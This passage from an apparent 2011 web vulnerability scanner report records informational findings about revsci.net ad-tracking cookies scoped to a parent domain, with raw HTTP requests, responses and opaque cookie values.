WgmCQGLT/TCxqYlih8+r+Xu4Es+/UeCAGmE3lf/JBI/gGruVa/uM6e7vHQd1OSS/COyQsjvEAGUBIXdEkcR6OtcY4eJ8OStaMgG3cDy3jNVKs5MGUMxfwCNjwVMWVtTvp/vXVOqBncG+OeN/9pdvX74CD/ttT2JCl6QOfpYU7OCt2m/gd23rUZqyjG59CQM4z3vIFKAK6OIzEkNx6J1/mKd3ZSB5lMCRuMO4LT/blOON9GR2GfLPJdavuCYmt7sny4PrelYUgLIdsoOQD6BDPaERLR2HN6qZmG1cKn2TB/cNH1lwqy+PPasbRy7jwfCnqmWcJuAjQnnJHLJHE/kj041JbIWLOA0aV4QrN5+QMit9GSHku9ZjHAecw50JHoC557ljhAjrIp2YbJsHAMOrS4xcUzzPsx1eYk5e+QOV2mZAb3IuGMqVXEnpcUwRMcvEfkE9bzm2DV9jtXvo1Da2OZIG/oXNLXVeTJxdKidPkpp8zRaGyAgmR3hdzL8+KOov5tamiPTE7y2RclC5mpcWB60+YbpNdhGoweN2e7x5T3DdTYjlzSLdaCmX+6064hZ4XzB3EVtoX82h70nChmOiBpZzbcmSab9F2xJfkV9DMAIjn8129X1uDMJqcLaLMGkyG9O/aIif8pjTW8ltQo1YCxzJeLgHnwzAuD47NlpdBA0IGh+ONnWhWaSFgyC+MSUtZtzZVAN4aMdpbmOitUm/OxbJizbbVdwUzndrCzFu+ni9AthAepVTfGUV/Su4lDPWBN1+vy9gsR9jvFRi3gOTPNuiGo2fHVPWl9GMS3q82ZdTIOwRnUSDCcN+dh3urNbvju/GoWXepKdJ6Q/swwFE8+p8dwKXznqDyCF2zdbD2tLLxXLYzQN9uPAIJNkCIsbj/nwYblP2lxsshVTI0iYpmJ6cl7EokbOp5n7gDvVL2+umDlXgiuHcOfXwYutQ7vXKhNFntQaURVrsmcVS9Q01lxtki1jqnPvKNiJq6IhiUT2EBMZQT6CTRxhesQggGHTOkHX8Ck6/k="; rsi_segs_1000000=pUPF5MOhOXMMpzaBv3Bh9uz8rvh2rOfqkHGdHHnLYyViGymJW18v6pxo9TQQ/CMgK6G8jF0HnU6SSkHFIHZYBIkHWaCW/4z8aSiyg0TBnt14JwP+YaUQ4WilEZa1mbBjW7OLLoFHNs08LFTYabxkEEVPU2c06DjOYyj3SuXjsHKw1HvrO7ZFiKShbeX4nTABONWLPoErccRrS7uZVBYf4XW1pSftKp6homnlrYgI1lp22zIsyNkdhnVKrDbFyV2uJv/1BmUlBKwDFWqjTCpvCBZbLtKKzv6WltjQ7pWUjMNH+30I2YuP5FFcJfLwMN3eawf2+KLTThx0xTTlYHzawZQXdaHyUF1KXX9ZUQI1rnykVwY0b8NIDFThSHpzPg/1KsPTtEbccXni5KjMfY2uitH8+9UVMO+wju4WEeuZKB8FKgU6cehntT5GXb2FHCSnOuQr5cRk4/G9C48Yj+vITAelROgC71b5DWCbTFLuBUVahBK23tz8t96mJv2dsKUshtehpAP/V9o9cgSGa4+P9m5Nh45d+MO5rZ533gxKtvM05DYGvSsTRKCtVa9gunn7mpho7tajblWHjCKmgW6EPMk/x8oKzsNeApsnc+bPME7UwzymIxqIHQLCYrK5FhySLsdHmYs+K7/K2NDh4PldVMVoDg==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5EOhOHMQpzax0RBh/hoCyNk8g7ZPQp/FTCAB2QQ4O3XY0n+Y1T9p9LQR/PMkrQWV5q//GhmELDb2WLZYBIlHHq5L+Vu6oYeS0lSb84FoFlDVAUEgoeqnG3CWwQTGxfWB8xHls9O7wrmK7H9XO38QK/GK4m862ulXtBHxCFUVWq3L7O2akFAHGDjHWNgyYfzAVKcGUKsb7c0ueNVXz4bz+RGuUL0cgwDiNcshcM5rYLHakbTgOQpubiK0FnBwLC4Iw0QwgHlnG6G7nFLlfK6YH9XLbiwKr5G1YfVXDdoBS3tnzQ08ZuM5KoSKLm23Mt2SxjiYI8+RcXY5QaOh0SofSSymrU58McEJNKMZ4/9Aq1RNvG6F8HWKJRGbi5fzUpuQWLbTntgaLEyh+Ovw0FNtzEoIhpX/z4XCnFAOi1IlVuByF8jp0Xb98q1rGU21xgkt4RCn3JvBikgQlZI5JK0CxY7oVaG5eG9rlgxhrs9bkID/BCDos5cWZVp51AN9l3FoPWkzbOjBE8nea+Ut0CKbZnO5TIzGv94HEiuEF/hc+OsRT6l6ts5L0U+d+JKlpeBaK8xVnt+lGd11fNCUSykyq5Anzo1D0fw9EKv8Cg2XpPnETLw1EMX29eMJEqUnP3x4AypDPjS0kmCx+2RfowHaNNQ=; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 14:39:53 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 14:39:52 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

10.127. http://pix04.revsci.net/I10985/b3/0/3/1008211/167338616.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/167338616.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vyoS4ORGuZbSAKCIGSNrjQ0ubO+9Micc4VPat72X0BRE3fmuDUz/xw+ppzybIZwKwagY0WUnYiGBkFQqZouM+GZBQjkw/QKBeEE1wCXGHaX6NeLZFDnb808OczVZi/z1C2nYHyKGCe5170OipKEEqzGL9GHYz69OROKA+nYQRc07zJ3P+vzvxbMCdraiyFAw8fcNBWphT6vuk41246c95NOaRIsl5hE/ZCrN9ltl638ONtjh6IkR4C+Bn0HQU9SGKwzcG0oLUmfYwfR+/e01trCzWnlOqoD+91j7ecB5h6As6cGZTiUkAQV8S6WA1BOLiIf9dkzrU5cE72ZWc00qW9MXKl/yabXGZBe8iih22KEfajJ8TbmgLZkF3VJULSxXOsKgbLSYGygtQN54egzBWSJbEl9R/Hk7emp9CxqGU21BjlvfqFEzHuAYT+0RMmU8yDn8fMKd76Sem/n1/A45enPmYXILccTgptCeFmnyrhXnmwcWGfPLM7ivdDuO5LCNTcsLU/YXpH9F28xHaWooScWoFISWonfb5T4sxUmX+r1XZ7sL50dfpT/3yJpT7qjRECODDnaNjDwdmDq/nU81qU4zkObBUGuxPKlZD0L0UrsFo4m2KveUXns+WX8POygBYhoGA==; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 13:32:43 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /I10985/b3/0/3/1008211/167338616.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%253F_rsiL%253D0%26DM_REF%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%26DM_EOM%3D1&C=I10985 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_H07707=82f4957c1a652091&H07707&0&4dfc9b6b&0&&4dd62389&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I07714=82f4957c1a652091&I07714&0&4e047730&0&&4ddc9a7b&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05539=82f4957c1a652091&K05539&0&4e047732&1&10592&4dddf043&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e04773b&0&&4dddd39f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_B08725=82f4957c1a652091&B08725&0&4e047743&0&&4dde0faf&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E05516=82f4957c1a652091&E05516&0&4e047779&0&&4dddf225&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e04da55&4&10004,10009,10016,10017&4ddf3979&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_C07583=82f4957c1a652091&C07583&0&4e065339&0&&4de08ea4&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06543=82f4957c1a652091&A06543&0&4e091f12&0&&4de303e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05540=82f4957c1a652091&K05540&0&4e0bcd60&0&&4de5e0dc&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_L09855=82f4957c1a652091&L09855&0&4e0bd03c&0&&4de5b5e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06546=82f4957c1a652091&A06546&0&4e0d143b&0&&4de6f601&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F10931=82f4957c1a652091&F10931&0&4e0dae7d&0&&4de84145&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e1adc2a&2&10055,10194&4df57f23&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=MLv3NzMJZjpnHtrXN5qKIC+r++BQc/UqXr6jBV8rYdQ2D2XTncAIbXi2tfypgqfJvateR9HJ4U08Qnt4Q2fIWiATrGjjYlnmNAcpRXld8nmx6VM+uG+xOukp7j3BXwCS+Luv7Iuhg7/XvJ35U6jPutiAWAtPb3VwRE0DesH0KA0i0eMjcVNUP7mp7BMGp+B/EGjVdYGzWqUknsvKweFT+/IFuGMHAsu+afJ2kQXBxwEXEnI284PCB7hzurlburO7x14hGsWFzj8KUtk9jQcjtZkMIKSy3mn1V8am+dxz7UodZWG00rBYYRZ0cjlSDFYadKnlaFZl4WjQWkWRDqKEZH59Ut9twiQUx1iXCG8iFmI23cdID0H8ErMZAAE9/iEW5Yjc/hsRxFefezjBeBN1Ocjx3hzzVxkcq9wXVCW7v9gjbPES9RIEJjX6rn9tQMgTqBUTCp516rrWgoESvRqsitgEQSw3RmRhZBJdy4iqp4/JObA7C03jVIHHd/OgUUtxL0I0IbsQQqVUXpCGyO4rskRuwHM1KU/Jbepu/3y3XB4F9Lpy9Ufx6j6TSc6J96HphMM85TwXx7fD13QYz5YKzM2Txz12JQmdrq1UZPM96lln/Tfbv2urd8XVBeiI1PTpV/L69BK1Xr+RcfbDf0XR9SagilEdfA6T2TJyH9iMhcnhz1NWY+qhlDxMPSQaFcD6mD4u9+aPdPJnLGY78YS0lsmAzuY++q+UmVQ9O8MuuZfRn1viBcFYPPO/Ehb77dTJg0wIZ8rAgaA9RmflsAck2uy+gTZ349vcjqFpcMwaqqwB5WRmMPQJfweVMtTvWPkkuS9FWQ4pNWS5KxqAkGqf3hsSys/hL24QuN0Suhcm3H/ZLfDFTqH/XhIvPbQmPRq/T9/Oc+GUdIt7rL3IepeiBMujgm4x4y9De6/SXY/1G/dfg6gVmY7m2ZuGE7hYkw+0BL1/z3Zw9Hnzz70tcwPvezpWza85RkoiRR4+8BSNSbxgqdKTjuNKkY//8VMIWdyl4Z2G2dbxHMzBp97k+fXUncflugKR6WJ8lFLHcEzV81qBR501CzuBtIGsDgXjenf/x2WgwCSnHkndwCiBiUknGxwx+S2SpubYRjjXHCy9bwvmSmxTUa1b7VEsSrnPYypigb/zefKrVe0UPipLc5LkWDwWtg7FYvNKgWyrLb87NYz/h9VK0yntvka2xKvG4ZXqdf37tzjnNpWV2mpNmVbXTWnwQHwFdwd1rTkyP4UI2q6Kw6oi7YOb0U5adnK36hSUia4WXRH2RwYHsCn0svKj/kHV8m1eqgqrQs3jbnuX9y2EErURl7rwma3gtd6vJ/wuhcNtKGMY3enJXaQADSqbB0spsB4qUnmbZSLzuv8rqi9HbmRhdSm4YgYqeFLp+fAJwyT0LvsXIBVraanECinitRCiTcdsUjy+Iclhq+jG7T5SGgSZwhcwPfeyy8ger2ZfuAwEnnXpR8wMbYlvC194xV4LyY+q2jPozoQcLN4gSBMEGMEwQW6I05fTMiQJwrZSC/RUdb37nldhcv/9IDt9kHI9GPKzBVhEKgbqLPQFxzg45maBZPvKUGezRmdPo4ypTAmYk/f442D28FM08AcSOkW9r56J6aLrI8/7DOBzqz3qW0U6I7gh9MbOFpXcdo0Z0AZYacCAtKnx5lwhc0/3MJQtviHwhIF9xJZUcl5GaheXf4FEovMiK7s8zlGYnWDNAXdyBWOCn7utL6sxfF81wN9Lx/wXDh5B8xgAqQd5CojbH/a9VJDCKq6ASCHPQToFEBSV4oYY5ylpm4uijSLLmA+3NzrSUmfaX5StLZBQgT/162m/K8Xv8D/g1I5tSdEUSPPRbPD6PDTK+hieE+mG8gEYRqblqpGfYRizEg==; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1ee036&2&10654,10670&4df8474d&1f1a384c105a2f365a2b2d6af5f27c36; rtc_YxMN=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; rsiPus_iIbq="MLsXtSMNJjhvJZE469KkOkhRwa7hUMAPxrf6hJozRd8Z+A+35M/kolpihGJj4llhxoQ3e/UtCK92NbndG2piitFk5yhzPh0AG9MzzTvadDEwiYGhrf99bXY2VOe9PIcfFRS2/TJRrsBbxPCqZATA815Vb6OrwpvJR+zQ8bOO2/nv1rcPU+AyzpDlS7vGNNnVJMgr/RKngDIgfXhynEFr5mmIPDgA3ND9Mg9PYeYOFswTZ5/MFvDNFQ/xg0ls9+Zac2PtHHd/vcSZVg3Os0SHaRdB/a7gdXsVsi19RlcLY6Oad7u0gPC7cPEBwmNrlAsZV+Vh/8IFvs3DS/BInFTIiqtPdA6QSmXM5J8zvIBegihj3Pwn7dKz5ON0DZqjpsE/a+8TjsbOKSxJXEN0FdjU6iYnrr4sm43V+zXZBzAm69bYeJ+Vb6rT07ECFHDQKAa4pRq2IxLgJ2sRyBRrGoBBe8ELWOM1Lnb6YQKt+ixKucJqtUFRqc7w0NVrG7HAEgEHkquAvQv6Jcfrxwi+i8EhdNTJ/2wLdw90m57mfW/8wEl1Sr90JpQsbE/IsCbyYvNMD6LPowUAeJquNoUvcJ15ZhT5JVWOhxRdmh3jHKKbhG0vT7jcewcH/yNg78tDbBvZ/pIuMmj27HlZjG/sP1dw0RUXo63IFakn2cSTWqkDUtHLSfKzowIkyIDF4O7k4sY4zYLJ/KL5J7IOLRCxuhQWtZoL9fcC8iEvVpAT5nTNBjNkf005ZxVZ3qLiEgowWPCqFK2jkoJAdp2Jxefwa04ogjJKwncPv+k4h2HIdVg+u8oFahyP4BqQAvNWQIKTWfcP2wCcuqr0GndfI9hMrsAYhKeBo7TelukndsBHuFQxZwpC9C3SfCIIPvjRNUz9whCjtsjpxSN1hUfEXrEWLVe0LoO3piMgyi/wseTHjf4qkxwRntwABB+RgtWesMZS4JFy3uVgCRzC+akPxyOBjvxgMs3ifZx67RJPRUHCPQXH6MTJazoh+D39NXc14zW0+86JURG7MgkS3w5S38HoJbRca8dgMt49KTI028/pUCNKuTkoK8CbWI/o9jkK12xn4aZDqwtOO1O44zuwvNNSix6YpINHVJUswxoRUMjU1/KbLmDV0EOlttp9NwrxWHDu+eWtTdSt9ETRcnCzXb35dMFxqM8+PEhC8WARLiFlca7Pzc7jE1iTmSnzogQUasLBANIrZ0oJjm7B0qc7tTc7rABfDqEU/F14BgyyL+QmcwSqE7nHeOxVuHOjVRCG4aVe2iyQKB3/6ILW+OADiNr7oTqK1iUFY3s0+1z4dKVm6XyypxZlZkviVcn9/ysd9NcKbcC7Ftkj6Y4ojL65nz8T1qdImmrf9A=="; rsi_us_1000000="pUM14ymnMBYY7dXKYa7+iv3EgSSw/Y8tJ+gZNnYLLHa8d4Y1v0lUJEkxjU7NelY0QcHuDIduu0zKlUsklaD7QK9WUfcNgGQxkM69Bg6zOefWQthJGqP3aEP/Els3EHmRToETTZFmihDhiVKOCXLxkiM17TU7zj4ngiQ4oRnPnFK89XPRmRV4IWSdXROcDuxjITdkLEY03nS13tB3wtTOwQKZEgSeSALCIxbusJEfXL9zmpsCYE02t4xzi4o9NKvXRAGU8PiJjcr/rHOJeDVjh+8Nwr6ukBIEminfuLWP1X4UWXwz4MKEEm7SUVd6CUcoDnUzXeAi/Ct/TuruCiMtaygwY0AtigC9uSei/+HoKkWB4Aowhx48DKSIqsQsg0UYDjaqK95XiKBS91uetAb3fI46x9yMJzr2oOkBXZ6ASf282CVOAOSDpU+O3dhOmqH9FP7OlPwI6xpt0c0TJMRkYA1mYjUiRR/uyIbwdNh6U9k6aX8u2jCSSNMVVjoz3jeW992nCBHnY0ZebNyHYB+5BHCJaLbd3Y+vUnRO1AywZU/afh7J4ubm+3ZBLisIyJHrfxHUHGCdW5gu8xl+S5lSVSzC68EQLryJ2kLPM++wzdzfYJRZ4rV3n+z1mPC4RG2sCPSKnvojwQRRuEoOLedXS6n5TkX9ViqatrSRDGUyndE1zo6CqMjnpoKZuRkeayYD9xp2WKWkvoW3NE87qLN4wdVwPwu1ubEy+L9EqVq3HVPE6svjFDRKAQzOnLOgR/FJezpSrIUZqgardDX6vRHNuQZWRbawgLYmJccd9iGQXnNrALh3E7VbTyT9rFknOQxAEOvASjXHCpopflgmebtlwM/239MGbOUsr+LUBecTuF7c3UA9MZGvdJ9gZJCqUW4hAWPhRWZZaZfyUkkUr5UdBiBlLI7NWaebk65a1YqihhOCEg2cwE6Zih6GfB1WT2QdegbRFaICdC+l/vKzbHrKq0VGMBifZSmcJO4CPCjVY//F9DAa8+m3o+aWkBghphs/ED28I48cTB7FTcWJHXuvpbQs6qk0sGGCL2Qm2G7jocOOpBHUBUB2HhPc31J7OThksnfG6M3RiPtJLoOhujGBo6UPvjAr74jA4OKswU78Y6NYg7EcLi6OHwPK5PKF6abTG9owpzKUW/j289fn6YrnC2vsPKnQAPD7xe5GP2s8DrgSglVqcCp3A5fzuvGFZpfGcdRpPWN3Gv12f7yeEbeEqLEuf0acfDwuvv3YnIxjwzlZ62xFkzUQo4nv3UYwSNPkGxLhJRvFODOO8Dg0k2D2rMrE2MIJ3Hg2d6bLlTIPKSp0S4fDuJqLoGboJuooDvPDIKDN56/AXqyRj2N5VlVNPV9EQaaOkht6r05/h1/+ndkpLqqYmi1MHwprxFHI3BUZbDjwhVOgRG5Uitdq0P0FayIBteX/DmOMKol8QwCCbWd2j6o+bm3iHkNeX6Ysu9uMKYQctKtbd0XZDbJdqlGgMaSGGp2PJI1nl0O1F7wTDLDznMAzgCvcHkjs8NUFqyinHJSoJTxtiXWwV+qJ9Ahjuhnc9OIUSLAr/YT1fwWmLdl0ANbjB7i3Ndem8uI5nAR4x0HYvm3wVNapELV6UykLaLXk7g4jM0riAba389VxssvAdqeOspZdY5ct9FtzTp8Acb7Ta0jyFrTi+BXl04rUiBNnZgMfeTMAOwIk3ry4lbEwqV1EwF6YBaiQrP0ZBut0SQVbPCVWx/txNRCJR4cfJ5WSMkK9NV051cbH+gZhq8mxB7dDM2Gf9wGjaoasuGCHXPr66n8="; rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vz47ssdu65JwcIlocE02QQ4O3XYyvheM/Ns0vAjloMpK61ewq2/t7wxEnZxc6hXT/TAhJnU0cgpqwwScHEsq8jKcVWn8biBJeiwj3bt/Z7Jno4eTUvRzGf2u88DtwWuaST+ZtDhThYhMvIG0vXZtjIxxqeI8d5ivzt6ti+VgklbAkcGFmgFF55zOhLt+Jj4m8aYFMryjeoi0TlzQ7R2IFcY8A30Ro53whtEoiH/Bu+WvCryZgtVikCSLPEeifdrCBZbLvKqIu+csveC9Xvf9d5VgUHFOWSjk0wT5Gkq6w5xqk/1aGiVp/rFuGh27GkpR+EliPHK1f2TWLYL1sXbC6eUwGWzUNsS8f4urLm2iUv1hCiOqDYuCA+YOB3u+NuABggAS5kmHVELSWX4cloNZjgJZMm0hekaZh4U8yWjZaCJ0Bmnt8bp+36AYTy2RK/Zy6wuxfF0yL+Z3FX0VqsfdIqoFyg4NZ9NBFcHjaCoFYYr0AdbqGizxKgPo/Ftm1QEHpkI4DLYPx1v4twYX+7JhGYwS2jFoiZKvSa6/ffztWb0tOFBENvJIhRaOVSBmQNYSU8lMS2Hlk5xfX/5RECzSnBWhBipHG/JhpNGkSgZl9KYAvHyF+m4l70RCkw2yK2aVThO

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vyoS4ORGuZbSAKCIGSNrjQ0ubO+9Micc4VPat72X0BRE3fmuDUz/xw+ppzybIZwKwagY0WUnYiGBkFQqZouM+GZBQjkw/QKBeEE1wCXGHaX6NeLZFDnb808OczVZi/z1C2nYHyKGCe5170OipKEEqzGL9GHYz69OROKA+nYQRc07zJ3P+vzvxbMCdraiyFAw8fcNBWphT6vuk41246c95NOaRIsl5hE/ZCrN9ltl638ONtjh6IkR4C+Bn0HQU9SGKwzcG0oLUmfYwfR+/e01trCzWnlOqoD+91j7ecB5h6As6cGZTiUkAQV8S6WA1BOLiIf9dkzrU5cE72ZWc00qW9MXKl/yabXGZBe8iih22KEfajJ8TbmgLZkF3VJULSxXOsKgbLSYGygtQN54egzBWSJbEl9R/Hk7emp9CxqGU21BjlvfqFEzHuAYT+0RMmU8yDn8fMKd76Sem/n1/A45enPmYXILccTgptCeFmnyrhXnmwcWGfPLM7ivdDuO5LCNTcsLU/YXpH9F28xHaWooScWoFISWonfb5T4sxUmX+r1XZ7sL50dfpT/3yJpT7qjRECODDnaNjDwdmDq/nU81qU4zkObBUGuxPKlZD0L0UrsFo4m2KveUXns+WX8POygBYhoGA==; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 13:32:43 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 13:32:42 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

10.128. http://pix04.revsci.net/I10985/b3/0/3/1008211/174739392.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/174739392.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vyoS4ORGuZbSAKCIGSNrjQ0ubO+9Micc4VPat72X0BRE3fmuDUz/xw+ppzybIZwKwagY0WUnYiGBkFQqZouM+GZBQjkw/QKBeEE1wCXGHaX6NeLZFDnb808OczVZi/z1C2nYHyKGCe5170OipKEEqzGL9GHYz69OROKA+nYQRc07zJ3P+vzvxbMCdraiyFAw8fcNBWphT6vuk41246c95NOaRIsl5hE/ZCrN9ltl638ONtjh6IkR4C+Bn0HQU9SGKwzcG0oLUmfYwfR+/e01trCzWnlOqoD+91j7ecB5h6As6cGZTiUkAQV8S6WA1BOLiIf9dkzrU5cE72ZWc00qW9MXKl/yabXGZBe8iih22KEfajJ8TbmgLZkF3VJULSxXOsKgbLSYGygtQN54egzBWSJbEl9R/Hk7emp9CxqGU21BjkGXQ0oLjsSKY/4HossPOTKgOG0VtDwsiIIhSOP7byyJpLCrXXOsLPkZ6Z2LaGx1SrMuvvfXos1Y4bG6iTztIytZ+4oloPzFDWLZalCAK9m0inSch7wHrKI2jDUVJMyl3syAq1j4FvExFWoTXBQT1YB2yKMYnbjVCCN585UoNoYNGZauHeS+e3SNHvhCIOr3FpcNYlbfpi0IF12pvSN0XZoFA==; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 19:03:47 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

